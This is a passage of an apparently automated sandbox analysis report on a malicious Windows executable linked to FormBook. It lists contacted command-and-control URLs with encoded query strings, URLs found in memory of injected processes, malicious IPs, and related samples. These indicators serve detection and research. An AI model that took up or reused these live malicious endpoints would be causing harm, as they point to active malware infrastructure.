www.magnoliahairandco.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.skyinftech.com	unknown	unknown	true		unknown
www.webuyfontana.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ie8mce.website/3osa/	true	Avira URL Cloud: safe	unknown
http://www.witoharmuth.com/jd4u/?fD=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.webuyfontana.com/fhu0/	true	Avira URL Cloud: safe	unknown
http://www.kacotae.com/1134/?fD=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.binpvae.lol/a472/?fD=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.lecoinsa.net/xu8t/	true	Avira URL Cloud: safe	unknown
http://www.binpvae.lol/a472/	true	Avira URL Cloud: safe	unknown
http://www.chowzen.top/fv92/?fD=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.witoharmuth.com/jd4u/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.duzane.com/6tsi/	true	Avira URL Cloud: safe	unknown
http://www.shrongcen.com/5965/	true	Avira URL Cloud: safe	unknown
http://www.skyinftech.com/gwqo/?fD=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.duzane.com/6tsi/?fD=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.ie8mce.website/3osa/?fD=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.webuyfontana.com/fhu0/?fD=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.mg55aa.xyz/2c61/	false	Avira URL Cloud: safe	unknown
http://www.zhuan-tou.com/lx5p/	true	Avira URL Cloud: safe	unknown
http://www.mg55aa.xyz/2c61/?fD=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&j0=vTcl_2X8QJ	false	Avira URL Cloud: safe	unknown
http://www.chowzen.top/fv92/	true	Avira URL Cloud: safe	unknown
http://www.shrongcen.com/5965/?fD=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.am1-728585.com/9yv1/?fD=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown
http://www.lunareafurniture.com/wzcd/	false	Avira URL Cloud: safe	unknown
http://www.kacotae.com/1134/	true	Avira URL Cloud: safe	unknown
http://www.skyinftech.com/gwqo/	true	Avira URL Cloud: safe	unknown
http://www.zhuan-tou.com/lx5p/?fD=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&j0=vTcl_2X8QJ	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/verkehrswende/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	write.exe, 00000005.00000002.4491856252.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000045C6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://themeisle.com	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.west.cn/services/mail/	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/kontakt/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://js.users.51.la/21876343.js	write.exe, 00000005.00000002.4491856252.0000000006020000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004110000.00000004.00000001.00040000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.duzane.com/6tsi/?fD=32QAWULDWbDdguRmN	write.exe, 00000005.00000002.4491856252.0000000005CFC000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003DEC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/feed/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://hm.baidu.com/hm.js?	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2	write.exe, 00000005.00000002.4491856252.0000000006020000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004110000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.lunareafurniture.com	IwDtIjtyhRCIk.exe, 00000006.00000002.4492909372.0000000005860000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.west.cn/cloudhost/	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	write.exe, 00000005.00000002.4491856252.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000045C6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/sample-page/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/xmlrpc.php?rsd	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/comments/feed/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.west.cn/services/webhosting/	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	write.exe, 00000005.00000002.4491856252.0000000006344000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004434000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.w.org/	IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.west.cn/services/domain/	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/wp-json/	IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/	IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/ueber/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.21	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://gmpg.org/xfn/11	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/asset	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.west.cn/ykj/view.asp?domain=zhuan-tou.com	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/themes/hestia/assets/css/font-sizes.min.css?ver=3.0.21	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	write.exe, 00000005.00000002.4491856252.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000045C6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.west.cn/jiaoyi/	write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.witoharmuth.de/wp-content/plugins/quiz-maker/public/css/quiz-maker-public.css?ver=6.3.3.0	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://zijrmf.com/register	write.exe, 00000005.00000002.4491856252.0000000006020000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004110000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.witoharmuth.de/portfolio/	write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.witoharmuth.de/blog/	IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.witoharmuth.de/projekt-details/	IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
102.222.124.13	www.duzane.com	unknown	36926	CKL1-ASNKE	true
162.0.213.72	www.chowzen.top	Canada	35893	ACPCA	true
116.213.43.190	www.binpvae.lol	Hong Kong	63889	CLOUDIVLIMITED-ASCloudIvLimitedHK	true
176.113.70.180	www.ie8mce.website	United Kingdom	209484	ASIANETGB	true
15.197.204.56	webuyfontana.com	United States	7430	TANDEMUS	true
85.13.162.190	www.witoharmuth.com	Germany	34788	NMM-ASD-02742FriedersdorfHauptstrasse68DE	true
217.116.0.191	www.lecoinsa.net	Spain	16371	ACENS_ASSpainHostinghousingandVPNservicesES	true
104.21.14.186	www.lunareafurniture.com	United States	13335	CLOUDFLARENETUS	false
103.120.80.111	www.zhuan-tou.com	Hong Kong	139021	WEST263GO-HKWest263InternationalLimitedHK	true
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
123.58.214.101	www.shrongcen.com	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	true
64.226.69.42	www.kacotae.com	Canada	13768	COGECO-PEER1CA	true
103.138.88.32	skyinftech.com	Viet Nam	45538	ODS-AS-VNOnlinedataservicesVN	true
35.241.34.216	www.mg55aa.xyz	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1456438
Start date and time:	2024-06-13 11:02:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pismo1A 12.06.2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@15/14
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 50 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:04:02	API Interceptor	12371531x Sleep call for process: write.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
102.222.124.13	PO 05588060624.exe	Get hash	malicious	FormBook	Browse	www.retailscapital.co.za/qxnn/
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	www.duzane.com/6tsi/
	1PTLWkB6Xv.img	Get hash	malicious	FormBook	Browse	www.duzane.com/6tsi/
	nr 133764ZMA2024.exe	Get hash	malicious	FormBook	Browse	www.duzane.com/6tsi/
	PO 053124.exe	Get hash	malicious	FormBook	Browse	www.retailscapital.co.za/qxnn/
	bin.exe	Get hash	malicious	FormBook	Browse	www.retailscapital.co.za/h6lx/
162.0.213.72	dokaz o uplati.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.hawalaz.xyz/ercr/
	2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exe	Get hash	malicious	FormBook	Browse	www.devele.top/nm4d/
	W5TnMyRi78vdxpf.exe	Get hash	malicious	FormBook	Browse	www.gorilux.top/i8u9/
	IMG___001.exe	Get hash	malicious	FormBook	Browse	www.beescy.xyz/pdwc/
	Payment.exe	Get hash	malicious	FormBook	Browse	www.slety.top/6r3u/
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	www.chowzen.top/fv92/
	IMG__001.exe	Get hash	malicious	FormBook	Browse	www.beescy.xyz/pdwc/
	lrShdpqqbi.rtf	Get hash	malicious	FormBook	Browse	www.beescy.xyz/pdwc/
	pFvpxWS2lD.exe	Get hash	malicious	FormBook	Browse	www.beescy.xyz/pdwc/
	rShippingDocuments.exe	Get hash	malicious	FormBook	Browse	www.beescy.xyz/pdwc/
116.213.43.190	dokaz o uplati.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.bfnanub.lol/8qj8/
	quote.vbs	Get hash	malicious	FormBook	Browse	www.dvdkdok.lol/s1ku/
	swift copy USD65000.exe	Get hash	malicious	FormBook	Browse	www.skpjqav.lol/obrg/?06QLOv=hVjIoffB02K1Pf8+9OLCdr0Gvkstf9U9XsqthejjNRfOJFEbzBdlwXqlnLD4gz0uw7Sux+BvA7a2848UjEk2P0fjJYpvkyOjL14/CXsU9+tDUdKM7A==&HH8T=idl4
	QUOTATION #U2013 RFQ 000535.exe	Get hash	malicious	FormBook	Browse	www.augaqfp.lol/e00j/
